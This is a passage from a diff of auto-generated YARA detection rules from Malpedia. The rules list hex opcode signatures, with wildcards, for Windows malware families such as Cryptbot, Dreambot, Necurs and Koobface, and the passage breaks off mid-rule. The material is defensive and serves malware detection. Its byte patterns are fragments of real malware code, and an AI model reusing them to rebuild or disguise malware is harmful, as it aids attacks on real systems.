85c0 7403 8326fd } - $sequence_2 = { 85f6 7454 817d0818040000 724b 57 8b3e } - $sequence_3 = { 59 59 85c0 741e ff7510 8b450c 8d4ddc } - $sequence_4 = { 8d45ec b975382414 46 e8???????? 8d45ec 6a10 50 } - $sequence_5 = { 03f3 837f1800 7639 8b0e 03cb e8???????? 3b4508 } - $sequence_6 = { 8b01 eb0b 8b5008 3b54240c } - $sequence_7 = { c9 c3 64a130000000 c3 55 8bec 83ec48 } - $sequence_8 = { 56 33f6 85c0 741a 0fb71471 83fa41 720c } - $sequence_9 = { 7308 e8???????? 33d2 42 } + $sequence_0 = { e8???????? 8d8c246c020000 c7842498050000ffffffff e8???????? 8b8c2490050000 } + $sequence_1 = { 8bf8 85ff 0f84a7000000 8b442434 53 } + $sequence_2 = { 7c0a 817c241400000400 7304 8b7c2414 6a00 } + $sequence_3 = { 8bd8 0f8494000000 85db 0f848c000000 } + $sequence_4 = { 6804010000 8d842454010000 57 50 e8???????? } + $sequence_5 = { 2beb 8bc1 8bf7 8bfa 53 c1e902 f3a5 } + $sequence_6 = { 50 ff15???????? 8b8c2428020000 6a00 6880000000 6a02 6a00 } + $sequence_7 = { 57 ff15???????? 8b1d???????? 8d4c243c 8bf0 51 } + $sequence_8 = { 50 57 ff15???????? 8b1d???????? 8d4c243c } + $sequence_9 = { 68???????? 51 ffd5 8d542410 8d842450010000 52 50 } condition: - 7 of them and filesize <188416 + 7 of them and filesize <1032192 } -rule MALPEDIA_Win_Fanny_Auto : FILE +rule MALPEDIA_Win_Unidentified_102_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "cd0c75da-8b4c-5363-98ec-15a67064033c" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fanny_auto.yar#L1-L171" + id = "68f5ede2-e772-5b9c-86c7-72da7d6ddaff" + date = "2023-07-11" + modified = "2023-07-15" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_102" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_102_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "415f51a7b92a8dd2e587e9f69b01a611a89ad0fc5dace80d2d81091a3ef0d182" + logic_hash = "7cf959abf8b06a75a101a66334f27ae5601df812c1ddb140fd9298ef735bb0dc" score = 75 quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" + malpedia_rule_date = "20230705" + malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41" + malpedia_version = "20230715" malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b45c0 85c0 7422 8935???????? 6a00 } - $sequence_1 = { 8955d0 0fb645cf 3de9000000 7423 0fb64dcf } - $sequence_2 = { 8b4dfc 8b11 52 ff15???????? 85c0 7502 } - $sequence_3 = { 53 ff15???????? 8bf0 83c420 85f6 0f846a010000 } - $sequence_4 = { 8b450c 8945d4 c745c400000000 8b4dc4 3b4dd0 7d26 6a00 } - $sequence_5 = { 53 ff15???????? 8bf0 85f6 7420 6a03 } - $sequence_6 = { eb05 1bc0 83d8ff 85c0 7517 8b842418010000 } - $sequence_7 = { eb57 8b450c 8a4dd0 88481f 8b55d0 52 8b4510 } - $sequence_8 = { 8b4dfc c7410c00000000 ff15???????? 8b55fc } - $sequence_9 = { 53 ff15???????? be00000200 56 } - $sequence_10 = { 5b c9 c3 80a5dcfeffff00 } - $sequence_11 = { 50 e8???????? 83c424 eb03 8b7508 } - $sequence_12 = { 53 ff15???????? 8d85e8fdffff 50 ff15???????? } - $sequence_13 = { 6800400000 6a00 ff15???????? 897c2410 56 } - $sequence_14 = { 53 ff15???????? 8bf0 59 85f6 0f84e9000000 8a4508 } - $sequence_15 = { 33c0 83e103 f3a4 8b13 8b4d00 85d2 760e } + $sequence_0 = { 6bd238 8b0c8d187b0410 88441129 8b0b 8bc1 c1f806 } + $sequence_1 = { 83c408 8bb5e8fdffff 8dbdd8fdffff 83bdecfdffff10 c745b000000000 0f43bdd8fdffff } + $sequence_2 = { 8bf3 6bf938 c1fe06 6a00 8b0cb5187b0410 ff740f24 } + $sequence_3 = { 894610 c7461407000000 668906 e9???????? 837f1410 8bcf 7202 } + $sequence_4 = { c785e4fbffff07000000 8d5102 668985d0fbffff 6690 668b01 83c102 6685c0 } + $sequence_5 = { 8d85e8e7ffff 68???????? 50 ff15???????? 83c410 8d8594e7ffff 50 } + $sequence_6 = { 0f1085b0fcffff 0f1100 8bc4 0f108590fcffff 51 0f1100 ff5228 } + $sequence_7 = { 83c408 8b95dcfeffff 83fa10 722f 8b8dc8feffff 42 8bc1 } + $sequence_8 = { 6a00 68???????? 6802000080 c785c8e7ffff3f000f00 ff15???????? 85c0 0f84ef000000 } + $sequence_9 = { 8d45f4 64a300000000 8965f0 8b4510 8b4d18 8b5d0c } condition: - 7 of them and filesize <368640 + 7 of them and filesize <626688 } -rule MALPEDIA_Win_Koobface_Auto : FILE +rule MALPEDIA_Win_Rover_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1ce15537-cef6-5c0e-a9d8-b5edfbbc6020" + id = "1dedd2f8-89d8-5b82-937e-e4187a543962" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.koobface" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.koobface_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rover" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rover_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "b6b79af3be74d0a2238bfa51c4162b8333d68f5a5fb85b02563c06855a5cb17a" + logic_hash = "6367e2cdf56f70609689c8633064a076a7b96ec3143349e9ae15d5e0ca66c168" score = 75 quality = 75 tags = "FILE" @@ -182828,32 +185546,32 @@ rule MALPEDIA_Win_Koobface_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d850cffffff 50 c745fc26000000 e8???????? 834dfcff 53 } - $sequence_1 = { e8???????? 33db 59 889dfaf7ffff 889dfbf7ffff 899decf7ffff 899de0f7ffff } - $sequence_2 = { 83bd34c1ffff0a 754c 8d8540c1ffff 6a41 50 } - $sequence_3 = { 50 c745cc5cd74100 e8???????? 8b7508 bf63736de0 393e 0f85a5010000 } - $sequence_4 = { e8???????? 50 8d8538f4ffff 50 e8???????? 8b8520f4ffff 59 } - $sequence_5 = { e8???????? 8b8598faffff c1e803 50 8d85a4faffff 57 50 } - $sequence_6 = { 8d8528ffffff 68???????? 50 e8???????? 83c40c 8d8528ffffff 50 } - $sequence_7 = { 8d8528ffffff 50 e8???????? 68???????? 8d850857ffff } - $sequence_8 = { 8d4de4 51 53 ff90e0000000 837de404 7407 } - $sequence_9 = { 68???????? e8???????? 59 57 e8???????? 59 8b4dfc } + $sequence_0 = { 6800120000 885c247b ff15???????? 85c0 0f8422010000 8b35???????? 8d542460 } + $sequence_1 = { ff15???????? 8d4c2404 c684249c00000000 ff15???????? 8d8c24a4000000 c784249c000000ffffffff } + $sequence_2 = { 83ed01 0f8464010000 83ed04 0f845b010000 83bba402000000 8b6a28 896c240c } + $sequence_3 = { 85db 0f856f030000 8b471c 85c0 7421 50 8d442414 } + $sequence_4 = { 8bf0 83c404 3bf3 7537 a1???????? 8b4824 8d542438 } + $sequence_5 = { 50 8b442458 68???????? 50 e8???????? 83c410 85c0 } + $sequence_6 = { 8b8fb0050000 8d6b50 89442410 8987b0050000 8b85a8000000 8bd0 80e215 } + $sequence_7 = { 83e802 7426 83e815 740f 683f270000 ff15???????? 83c8ff } + $sequence_8 = { 83c40c c3 6a2f 57 ffd6 83c408 85c0 } + $sequence_9 = { 57 e8???????? 56 e8???????? 83c40c c744242c04000000 } condition: - 7 of them and filesize <368640 + 7 of them and filesize <704512 } -rule MALPEDIA_Win_Imprudentcook_Auto : FILE +rule MALPEDIA_Win_Dramnudge_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "da16e08a-4583-5528-aff9-b355b3ccc1ad" + id = "4e1e9905-62de-5567-9ed7-a82928870a8c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.imprudentcook" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.imprudentcook_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dramnudge" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dramnudge_auto.yar#L1-L90" license_url = "N/A" - logic_hash = "dc1ba99de715ff44414f303429509d324c0251135a2ef150545d89588c26b553" + logic_hash = "221dd8bcd930b6121a924fbe6761de15c83c657ddce0c9178183beb8828f75f7" score = 75 quality = 75 tags = "FILE" @@ -182867,32 +185585,30 @@ rule MALPEDIA_Win_Imprudentcook_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488d3c0b 483bf9 4983d200 4883ee18 4d03da 4d03d9 48ffcd } - $sequence_1 = { 4983c708 4983c508 48ffc9 75ec 49894500 488b5520 488d4fff } - $sequence_2 = { 4d8bc4 498bd2 eb08 4c89642420 4c8bc7 } - $sequence_3 = { 488d04ed00000000 4c03f5 4803f5 48ffc3 4c03f8 4c3bf7 7ec8 } - $sequence_4 = { 4c8bcf 4d8bc5 498bd4 e8???????? 488b9580000000 41b901000000 4d8bc6 } - $sequence_5 = { 4d3bfe 0f8c45ffffff 4c8bac2488000000 4f8d7c2d00 498bde 4d3bf7 } - $sequence_6 = { 8807 e9???????? 81fb0b000100 0f8dfb030000 81fb0000007e 0f87f7030000 85db } - $sequence_7 = { 4803c2 48c1f806 488bf8 488bd8 488b8424c0000000 4c8d1cf8 48c1e306 } - $sequence_8 = { 4833c2 482bc2 488bd3 493bc2 7d1a 4c895c2428 4c89442420 } - $sequence_9 = { e9???????? 48ffcd b938000000 90 488bc3 48d3e8 84c0 } + $sequence_0 = { 014218 eb18 03c3 8bd3 } + $sequence_1 = { 000c00 20b140005f5f 7277 7374 } + $sequence_2 = { 014318 8b430c 2b4308 03c6 } + $sequence_3 = { 000c00 e0d9 40 007374 } + $sequence_4 = { 014318 8b4318 8b55f8 03d6 } + $sequence_5 = { 007374 643a3a 7275 6e } + $sequence_6 = { 0000 90 000c00 20b140005f5f } + $sequence_7 = { 014318 eb5b 33f6 eb01 } condition: - 7 of them and filesize <864256 + 7 of them and filesize <1294336 } -rule MALPEDIA_Win_Dispenserxfs_Auto : FILE +rule MALPEDIA_Win_Meow_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "49bf9fde-27a7-5a52-b363-6d4c360f5198" + id = "3f4c85a0-7273-573d-9e5f-b6afea896e94" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dispenserxfs" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dispenserxfs_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.meow" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.meow_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "0ae97d732c7fee9f1fd4b6377f2a916fed962748494ab51169af7ce6e36e4229" + logic_hash = "0e149c089578c6685626f307f9368d702f8c85f1bb4a2cbda9a3a1cb6a651295" score = 75 quality = 75 tags = "FILE" @@ -182906,34 +185622,34 @@ rule MALPEDIA_Win_Dispenserxfs_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8975c0 8975c4 8b35???????? 57 c745b430000000 c745b803000000 } - $sequence_1 = { 68???????? e8???????? c7042410270000 ff15???????? 6a00 } - $sequence_2 = { 6a02 ff15???????? 8bf0 83feff 74ef 8d85d4fdffff c785d4fdffff2c020000 } - $sequence_3 = { 7c08 8d50ec e8???????? 57 ff15???????? } - $sequence_4 = { 7451 33c9 33c0 8bd9 663b422e 731f 8b4230 } - $sequence_5 = { 50 ffd6 53 6a03 58 50 8d8555ffffff } - $sequence_6 = { 898de0feffff 89b5e4feffff 89b5e8feffff 89b5ecfeffff 89b5f0feffff 66899df6feffff } - $sequence_7 = { 8945f0 0f823cffffff 8b4df4 8b45e4 } - $sequence_8 = { 8bcf e8???????? 8d8548feffff 8bd3 50 8bcf } - $sequence_9 = { 8d55c4 83c414 8bf2 8a02 42 } + $sequence_0 = { c685cefaffff53 c685cffaffff63 c685d0faffff53 c685d1faffff53 c685d2faffff53 8a85c9faffff e8???????? } + $sequence_1 = { 72dc ff75ec 8d4599 50 e8???????? 8b33 ba0f000000 } + $sequence_2 = { 0f8441070000 c745f4bb195c00 be03000000 8b45f4 99 f7fe 85d2 } + $sequence_3 = { 99 f7f9 8b45f4 85d2 7403 48 eb01 } + $sequence_4 = { 743b 8b45f0 83c117 83c00b 99 f7f9 8945f0 } + $sequence_5 = { c685dbfdffff5f c685dcfdffff7d c685ddfdffff7d c685defdffff7d 8a85d5fdffff e8???????? 898564f5ffff } + $sequence_6 = { 7907 48 83c8fc 83c001 7463 8b4c2410 8d4303 } + $sequence_7 = { 8a01 8d4901 0fb6c0 83e871 6bc037 99 f7fb } + $sequence_8 = { c6854dfeffff4c c6854efeffff3b c6854ffeffff6b c68550feffff3b c68551feffff26 c68552feffff3b c68553feffff18 } + $sequence_9 = { 99 f7f9 85d2 7445 8b442410 8d4f17 83c00b } condition: - 7 of them and filesize <114688 + 7 of them and filesize <492544 } -rule MALPEDIA_Win_Cryptbot_Auto : FILE +rule MALPEDIA_Win_Dreambot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1c6d7eb4-b0bc-5398-a1c7-a56c78dd600a" + id = "6c3809b8-d477-5125-8734-0179b265a99d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cryptbot_auto.yar#L1-L150" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dreambot_auto.yar#L1-L1031" license_url = "N/A" - logic_hash = "09f972034d92b74b2b134cacc0a51ffba015046eb0d41dcfb99ea848a8d7ad71" + logic_hash = "d649e332b74326d8b7e280b52a73b7636b1baab8e64673c71262bd2586c99629" score = 75 - quality = 75 + quality = 50 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -182945,37 +185661,141 @@ rule MALPEDIA_Win_Cryptbot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 33c0 85ed 0f94c0 8be8 } - $sequence_1 = { 33c0 eb0a b917d90000 e8???????? } - $sequence_2 = { e9???????? b949dc0000 e9???????? b944dc0000 e9???????? b964dc0000 } - $sequence_3 = { e8???????? 85c0 750c b961030200 e8???????? } - $sequence_4 = { 0f9cc0 eb02 32c0 84c0 } - $sequence_5 = { eb0c b99fed0000 e8???????? 8907 } - $sequence_6 = { e8???????? 85c0 750e b9ca070200 e8???????? 8bc8 } - $sequence_7 = { e8???????? 85c0 750f b955960100 e8???????? e9???????? } - $sequence_8 = { 744e 0fb74802 83e103 3bcb } - $sequence_9 = { 750b 8bce e8???????? 8b4c2428 } - $sequence_10 = { 7508 85f6 7404 c6464101 5e c3 } - $sequence_11 = { 7518 8b542414 83c718 8bcd } - $sequence_12 = { 7409 33d2 e8???????? 8bf8 43 } - $sequence_13 = { 2403 80e110 8ad1 3c02 7509 } - $sequence_14 = { 751f 8bd5 8bce e8???????? } + $sequence_0 = { a802 7410 8b4730 a840 7509 83672800 e9???????? } + $sequence_1 = { 897b20 8b4320 c6400731 8b742414 8b3e 6a00 } + $sequence_2 = { 7454 68???????? 68???????? ff7320 e8???????? } + $sequence_3 = { 0f8555ffffff 894730 e9???????? 55 8bec } + $sequence_4 = { 85f6 0f84a9000000 e8???????? 85c0 0f8483000000 } + $sequence_5 = { e8???????? 8bf8 85ff 755a 39451c 7475 } + $sequence_6 = { 751a 395d10 7413 8b4618 e8???????? eb09 ff7618 } + $sequence_7 = { 51 51 33c0 50 56 ff5214 8bfb } + $sequence_8 = { 53 68???????? eb54 3bf3 745c 395d0c 7457 } + $sequence_9 = { 837d0c04 7516 ff7510 ff36 68???????? } + $sequence_10 = { ebcc 3bf3 7474 395d0c 746f 6a0d } + $sequence_11 = { 3bf3 0f8496000000 395d0c 0f848d000000 6a07 ebdd } + $sequence_12 = { 3bf3 0f8481000000 395d0c 747c 6a03 } + $sequence_13 = { e8???????? 894508 8b7d08 eb24 a1???????? 85c0 7520 } + $sequence_14 = { 745c 395d0c 7457 53 ff750c 8bfe c7450857000000 } + $sequence_15 = { e8???????? e9???????? 3bf3 0f8496000000 } + $sequence_16 = { 4803542460 41ff5220 4c8b442460 e9???????? } + $sequence_17 = { e8???????? 4c8b1d???????? ba0d000000 41834b3401 } + $sequence_18 = { 0f84b5000000 413bf5 0f84ac000000 41b807000000 ebd7 493bfd } + $sequence_19 = { 4c896c2420 e8???????? 4c8b442468 488b0d???????? 33d2 } + $sequence_20 = { 7423 41b904000000 413bf1 7518 8b17 } + $sequence_21 = { 418d5620 498bcf ff15???????? 4c8bf0 4885c0 } + $sequence_22 = { 498bcb 492bd0 4803542460 41ff5220 } + $sequence_23 = { 0f8492000000 41b803000000 ebbd 493bfd 0f8481000000 413bf5 } + $sequence_24 = { 4c8b18 488b542460 4533c9 488bc8 41ff5318 } + $sequence_25 = { 488d5e10 4533f6 488b0b 2580000000 418d5620 } + $sequence_26 = { ff15???????? e9???????? 493bfd 0f84d9000000 } + $sequence_27 = { e8???????? eb2c 8b05???????? 413bc5 7528 } + $sequence_28 = { 488b9424a8000000 4533c9 4533c0 ff5028 } + $sequence_29 = { 0f8481000000 413bf5 747c 41b80d000000 } + $sequence_30 = { 488bcf e8???????? e9???????? 493bfd 0f84b5000000 } + $sequence_31 = { 5f c3 4053 4883ec20 4c8b4108 488bd9 4d85c0 } + $sequence_32 = { 0f849b000000 413bf5 0f8492000000 41b803000000 ebbd } + $sequence_33 = { 33d2 89442448 ff15???????? 33d2 } + $sequence_34 = { 33d2 3bc2 0f85bd000000 33c0 89942498000000 } + $sequence_35 = { e8???????? 488b5c2428 85c0 753e 8b9424c8000000 } + $sequence_36 = { 3decc7eea6 0f84e8000000 3d0470a8c4 0f8486000000 } + $sequence_37 = { 488b0d???????? 4d8bc4 33d2 ff15???????? 488bf8 } + $sequence_38 = { 4883ec30 837a3c04 4c8b2a 488bf2 488bd9 } + $sequence_39 = { 89750c 8d750c e8???????? 8bf0 } + $sequence_40 = { 4883c208 4883e901 75e2 837c243801 0f86b2000000 } + $sequence_41 = { 8b450c 33db 895dfc e8???????? 8945f8 33ff eb03 } + $sequence_42 = { 75f5 eb06 8b05???????? 35fc5585cf 4533c9 } + $sequence_43 = { ff7310 ff15???????? 33d2 89b7184a0000 39971c4a0000 } + $sequence_44 = { ff33 50 6810040000 ff15???????? 8945fc } + $sequence_45 = { 56 33f6 46 8945f8 } + $sequence_46 = { c3 6a00 6800004000 6a00 ff15???????? a3???????? 85c0 } + $sequence_47 = { 46 8945f8 85c0 7551 } + $sequence_48 = { 57 4883ec20 8b05???????? 8364243800 } + $sequence_49 = { ff15???????? 8945fc 85c0 741a 6804010000 } + $sequence_50 = { 85c0 7551 ff33 50 } + $sequence_51 = { eb03 8b750c ff75f8 69f60d661900 ff75f4 81c65ff36e3c 89750c } + $sequence_52 = { 817424105085b8ed 33ff 47 57 be???????? 56 8d542418 } + $sequence_53 = { 1bdb f7db 83c303 ebc4 } + $sequence_54 = { 8b9424c8000000 85d2 7421 4533c9 } + $sequence_55 = { 4883f8ff 488bf8 7445 488d842488000000 } + $sequence_56 = { 48c7c101000080 ff15???????? 85c0 7568 4c8d8c24d0000000 4c8d8424c8000000 488d542428 } + $sequence_57 = { 4c8bc3 33d2 ff15???????? 4821742428 4c8d8424c8000000 488d542428 488d4c2450 } + $sequence_58 = { 4883c208 4983e801 75e4 8b442420 } + $sequence_59 = { 0f84ca010000 8b424c a801 0f840f010000 8b424c } + $sequence_60 = { 33c0 89942498000000 899424a8000000 8984249c000000 } + $sequence_61 = { 498be9 e8???????? 4885c0 488bf0 0f84a3000000 } + $sequence_62 = { 8db4083089b9ed 57 8d45f4 50 } + $sequence_63 = { 4d3bef 7415 498bd5 4883c9ff } + $sequence_64 = { 8b45fc 0fb700 8bc8 81e100f00000 } + $sequence_65 = { ff75fc e8???????? 8b45f0 40 c745e801000000 } + $sequence_66 = { 4c8bc6 ff15???????? 488bd8 493bc7 } + $sequence_67 = { 395d10 0f8402010000 6a03 eb13 3bf3 } + $sequence_68 = { 6a01 eb3d 3bf3 0f8420010000 } + $sequence_69 = { 8d85a2fcffff 53 50 895de4 e8???????? } + $sequence_70 = { 4885c9 7405 e8???????? 4883c428 c3 4053 } + $sequence_71 = { 493bc5 742f 488d4810 ff15???????? } + $sequence_72 = { 57 6806020000 668985a0fcffff 8d85a2fcffff 53 } + $sequence_73 = { 8be5 5d c20400 8325????????00 6a00 } + $sequence_74 = { 740e 44893d???????? 44893d???????? 488d442440 4c8d4c2440 4c8d442440 4889442430 } + $sequence_75 = { 89410e 5f 5e 5b c9 c20400 } + $sequence_76 = { 8bf0 33db 81c1fefeffff 33c0 83cfff 33d2 895dfc } + $sequence_77 = { 59 c20400 a1???????? 53 55 56 57 } + $sequence_78 = { 7505 8d5857 eb15 488b05???????? 89702a 48897d00 eb17 } + $sequence_79 = { eb08 ff15???????? 8bd8 413bde 0f85fb010000 488b05???????? } + $sequence_80 = { 66b90100 4889442420 e8???????? 3bc3 0f859b000000 } + $sequence_81 = { a1???????? 83c036 83c9ff f00fc108 } + $sequence_82 = { 0f8e2a040000 8a05???????? 4238042b 7521 448bc2 4963ce } + $sequence_83 = { e8???????? 488b0d???????? 448be0 f0834156ff 85c0 } + $sequence_84 = { 83c036 41 f00fc108 a1???????? 83c01e 50 } + $sequence_85 = { 488bf0 eb34 488d0595d6ffff 4885c0 7428 } + $sequence_86 = { 6a0a ff15???????? a1???????? 8b4036 } + $sequence_87 = { ffb72c080000 e8???????? 5e 5d 5b c3 eb10 } + $sequence_88 = { e9???????? 83f916 0f8fa7080000 0f8415080000 } + $sequence_89 = { 83c01e 50 ff15???????? 8a06 3a4704 7311 8b0f } + $sequence_90 = { 33d2 e8???????? 44892d???????? 33c9 44892d???????? e8???????? 488bcf } + $sequence_91 = { 8d4604 66d3e0 66098310170000 8d4103 } + $sequence_92 = { 488b0d???????? 4883c12e ff15???????? 4c8b05???????? 448d7b02 } + $sequence_93 = { 8b9314170000 83432801 b910000000 8d42f3 2aca } + $sequence_94 = { a1???????? 8b4c2404 8908 83c01e 50 ff15???????? } + $sequence_95 = { 83a78c00000000 33c0 c3 51 e8???????? } + $sequence_96 = { 8b4036 85c0 75ec 8b442404 53 8a1e } + $sequence_97 = { 5f 5e 5b c20800 51 53 57 } + $sequence_98 = { e9???????? 83e908 74eb 2bcb 0f84fa000000 2bcb } + $sequence_99 = { a1???????? 6a00 e8???????? a1???????? 83c01e 50 ff15???????? } + $sequence_100 = { c3 33c0 483bc8 7458 488b5128 483bd0 } + $sequence_101 = { c9 c20800 55 8bec 81ec1c010000 8d4807 83e1f8 } + $sequence_102 = { 5b 8be5 5d c3 0fb708 6683f902 751c } + $sequence_103 = { 488bd8 488b05???????? f0834056ff 4885db 0f84ec000000 } + $sequence_104 = { ffd7 8b1d???????? 6a3a b8???????? 56 } + $sequence_105 = { 48895c2408 57 4883ec30 488bd9 488b0d???????? 488bfa 4883c12e } + $sequence_106 = { 488b15???????? 4c8d442468 48c7c101000080 ff15???????? } + $sequence_107 = { 83839c000000ff 397818 0f852ffcffff 33c0 } + $sequence_108 = { ff35???????? c74424200e440410 c744241c08000000 ffd6 8bf8 } + $sequence_109 = { e8???????? 8bf0 83fe0c 74c5 3bf3 0f8581020000 a1???????? } + $sequence_110 = { 8b831c70be03 3305???????? 8b3d???????? 50 33f6 56 8bef } + $sequence_111 = { c1e804 46 33048d1062be03 85ff } + $sequence_112 = { 7470 8b3d???????? 56 c7459c44000000 ffd7 8d45e8 50 } + $sequence_113 = { 397dfc 7417 a1???????? 8b55fc 354c4e4c7e 50 } + $sequence_114 = { e8???????? 3bc5 89442430 0f84ac010000 53 55 } + $sequence_115 = { 3934850875be03 742a 8d41ff 85c0 7c10 3934850875be03 7403 } + $sequence_116 = { 8b30 03f5 85f6 89b31c70be03 740a } + $sequence_117 = { 68???????? ffd6 a3???????? 33ff 8db7c4260410 } + $sequence_118 = { ff75ec 8b3d???????? 8bd8 ffd7 ff75e8 ffd7 eb08 } condition: - 7 of them and filesize <11116544 + 7 of them and filesize <802816 } -rule MALPEDIA_Win_Carrotbat_Auto : FILE +rule MALPEDIA_Win_Evilbunny_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b4eb53a6-f964-58c0-a140-244bef4847cc" + id = "2b83805d-7841-5694-8ab4-bb4f9f22ae07" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotbat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.carrotbat_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.evilbunny_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "c457876e0174827e0c750e3be442dfc99dddf6a42b624668fe26e525a3bccc83" + logic_hash = "7c88ed9ce9cea56ac78c56ce0f41ba384f06b92b5a02fe2a2de304167eb32f00" score = 75 quality = 75 tags = "FILE" @@ -182989,32 +185809,32 @@ rule MALPEDIA_Win_Carrotbat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b7c2404 66c1c60c 8b742408 f6d7 33cd f7d3 } - $sequence_1 = { 8f442434 51 887c2404 66890424 890424 } - $sequence_2 = { 8b0c8d20ee4000 8d440104 8020fe ff36 e8???????? 59 } - $sequence_3 = { c3 8bff 56 57 33f6 bf???????? 833cf5a4d5400001 } - $sequence_4 = { 8b0c8d20ee4000 c1e006 8d440104 8020fe ff36 } - $sequence_5 = { c1f805 8d3c8520ee4000 8bf3 83e61f c1e606 8b07 0fbe440604 } - $sequence_6 = { 888c05f4fdffff 40 84c9 75ed 8d85f8feffff 6a5c } - $sequence_7 = { 50 66a5 ff15???????? 6810270000 ff15???????? } - $sequence_8 = { 5b c21000 ff25???????? c705????????6ca14000 } - $sequence_9 = { 8f442434 9c 57 ff74243c c24000 686d3f4f6e } + $sequence_0 = { 8b4dec 8b5104 8b45ec 8b4804 8b12 8bf4 51 } + $sequence_1 = { eb09 8b450c 8b80b0d91a00 3bf0 7e44 83ee07 eb3f } + $sequence_2 = { c1e104 8b5508 8b4220 8d4c08f0 8b5508 894a1c 8b4508 } + $sequence_3 = { 8b4df8 51 e8???????? 83c404 83c028 50 6a00 } + $sequence_4 = { e8???????? 83c40c 8b55f8 8b4204 50 68???????? 8b4d08 } + $sequence_5 = { e8???????? 83c40c 837dd808 7308 8b45d8 89458c eb07 } + $sequence_6 = { c1ea0a 33c2 038558ffffff 8b8d38ffffff c1e907 8b9538ffffff c1e219 } + $sequence_7 = { e8???????? 034508 50 e8???????? 83c40c 8b45f4 50 } + $sequence_8 = { c7000b000000 e9???????? 8b4d0c 8b5108 52 6a00 6a05 } + $sequence_9 = { 8b5598 8b45f8 8902 8b4598 52 8bcd 50 } condition: - 7 of them and filesize <360448 + 7 of them and filesize <1695744 } -rule MALPEDIA_Win_Yoddos_Auto : FILE +rule MALPEDIA_Win_Necurs_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "731c8af4-0cfb-5784-8919-5690671f4ddf" + id = "3d1b7316-0e79-5ade-97ef-8f3ac3ffb54d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yoddos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.yoddos_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.necurs_auto.yar#L1-L159" license_url = "N/A" - logic_hash = "ffa9bd7fe378e38b72240a0efe08e70cc8c93f69e8ec293489b47b5a90d316d8" + logic_hash = 